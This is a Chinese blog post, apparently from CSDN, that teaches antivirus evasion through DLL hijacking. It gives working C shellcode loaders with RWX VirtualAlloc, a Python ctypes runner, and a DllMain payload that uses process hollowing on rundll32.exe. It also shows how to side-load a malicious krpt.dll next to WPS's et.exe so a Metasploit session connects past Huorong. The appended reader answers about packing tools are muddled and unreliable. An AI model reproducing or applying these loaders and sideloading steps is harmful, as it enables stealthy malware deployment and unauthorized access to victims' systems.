免杀对抗-DLL劫持免杀

C&Py-DLL劫持-语言-调用加载

1.使用visual studio创建项目

2.将文件名重命名为.c后缀

3.将如下加载器代码生成dll文件

加载器代码:

#include "pch.h"
#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口

unsigned char buf[] =生成的shellcode;
int main()
{
char* Memory;
Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}

生成成功

4.msf开启监听

5.使用python执行如下代码,调用dll文件

dll.py

from ctypes import *

#利用python载入dll文件

lib=CDLL('生成的dll文件路径')

#调用dll文件内置方法函数

lib.main()

执行成功,msf成功上线

6.使用打包器将dll.py文件打包成exe,执行成功上线

 

C&C++-DLL劫持-白加黑-导出编译

1.随便选中一个exe程序运行,使用火绒剑查看这个exe程序在运行时加载的dll文件

这里选择的是wps中的et.exe程序,运行发现加载了一个krpt.dll文件

2.使用Dependencies工具对krpt.dll进行反编译

3.右键导出krpt.dll源码

4.使用visual studio 创建一个新项目。项目名称右键——打开项目位置——将反编译的dll源码复制进去。

5.选中dll源码拖入项目,工具就会自动加载源码

6.打开asm文件,将所有的jmp语句删除

7.根据文件中的教程,选中文件——右键属性——如下图修改——点击应用。

配置时注意:

配置:选择所有配置

平台:选择所有平台

8.根据教程——继续打开asm文件的属性进行配置

9.项目名称——右键属性——c/c++——代码生成——运行库——多线程(/MT)

10.预编译头——不使用预编译头

11.链接器——调试——生成调试信息——否

12..c文件中添加如下一行代码

13.打开.cpp文件,写入shellcode加载代码(可任意)

如:

#include "framework.h"
#include "krpt.h"
#include "windows.h"

BOOL APIENTRY DllMain(HMODULE hModule,
DWORD  ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{

unsigned char hexData[] = "生成的shellcode";

char* v7A = (char*)VirtualAlloc(0, _countof(hexData), 0x3000u, 0x40u);
memcpy((void*)v7A, hexData, _countof(hexData));
struct _PROCESS_INFORMATION ProcessInformation;
struct _STARTUPINFOA StartupInfo;
void* v24;
CONTEXT Context;
DWORD DwWrite = 0;
memset(&StartupInfo, 0, sizeof(StartupInfo));
StartupInfo.cb = 68;
BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation);
if (result)
{
Context.ContextFlags = 65539;
GetThreadContext(ProcessInformation.hThread, &Context);
v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, _countof(hexData), 0x1000u, 0x40u);
WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, _countof(hexData), &DwWrite);
Context.Eip = (DWORD)v24;
SetThreadContext(ProcessInformation.hThread, &Context);
ResumeThread(ProcessInformation.hThread);
CloseHandle(ProcessInformation.hThread);
result = CloseHandle(ProcessInformation.hProcess);
}

TerminateProcess(GetCurrentProcess(), 0);
};

case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

成功生成dll文件

14.将生成的dll文件改名位krpt.dll和et.exe一起上传到目标系统

运行et.exe,成功绕过火绒检测,msf成功上线

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
### 回答1: 火绒加壳工具包是一款能够让程序避开毒软件检测的软件开发工具。该工具包可以让用户通过一系列的操作,将编写好的程序进行加密和壳化处理。 火绒加壳工具包具备了多种加密和保护功能,其中包括域名加密、资源加密、指令混淆、调试保护等。通过这些功能,用户可以有效的避毒软件对程序的检测和拦截。 火绒加壳工具包的操作简单直观,即使是初学者也可以轻松上手。用户只需要将编写好的程序上传到工具包中,然后根据需要进行选择加密和保护功能的操作,最后点击“加壳”按钮即可完成加壳处理。 在网络安全越来越重要的今天,火绒加壳工具包对于保护程序的安全性有着重要的作用。同时,该工具包的出现也提醒我们,只有真正的了解和掌握技术才能应对不断变化的网络安全环境,才能更好地保护自己的网络安全和信息安全。 ### 回答2: 火绒是一款国内知名的毒软件,同时还提供了exe加壳工具包。这个工具包的作用是对exe程序进行加壳,以此来防止病毒和恶意软件的检测和识别。 火绒的exe加壳工具包具有以下特点: 1. 简单易用:该工具包的操作方法简单明了,任何人都可以快速上手,即使没有编程经验也可以轻松使用。 2. 安全可靠:火绒的工具包使用先进的加密技术,保证了加壳后的程序能够更好地隐藏自己,并且不会被软和病毒检测出来。 3. 兼容性强:火绒的工具包不仅支持32位和64位的Windows系统,还支持多种编程语言,包括C++、C#、Delphi、VB等。 4. 灵活性高:火绒的工具包具有多种加壳选项,使用者可以根据需要选择不同的加壳方式,达到更好的防御效果。 总之,火绒的exe加壳工具包是一款非常实用的工具,它能够帮助开发者和安全专家更好地保护自己的软件和系统受恶意攻击。同时,由于火绒的声誉和安全性备受信任,该工具包的使用也更加放心和可靠。 ### 回答3: 火绒是一种exe加壳工具包。它的作用是将原始的可执行文件进行加密处理,增加可执行文件在被检测时的混淆性和难度,以避软检测出来并绕过软的防御,使恶意程序可以成功运行。 火绒可以通过对加密算法进行优化,对代码进行混淆等方式,使加壳后的代码在被软检测时更加难以被识别。同时,火绒还可以费提供远程服务,帮助使用者避开软检测。 然而,使用火绒进行加壳并不意味着可以逃避所有安全防御。越来越多的软和安全产品正在开发新的技术和方法来解决加壳程序的问题。此外,使用加壳程序也有可能会对合法软件造成误判,影响正常的使用。因此,使用火绒或其他加壳工具包时,应该在进行必要的检测和测试后再使用,以给系统安全和使用造成不必要的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值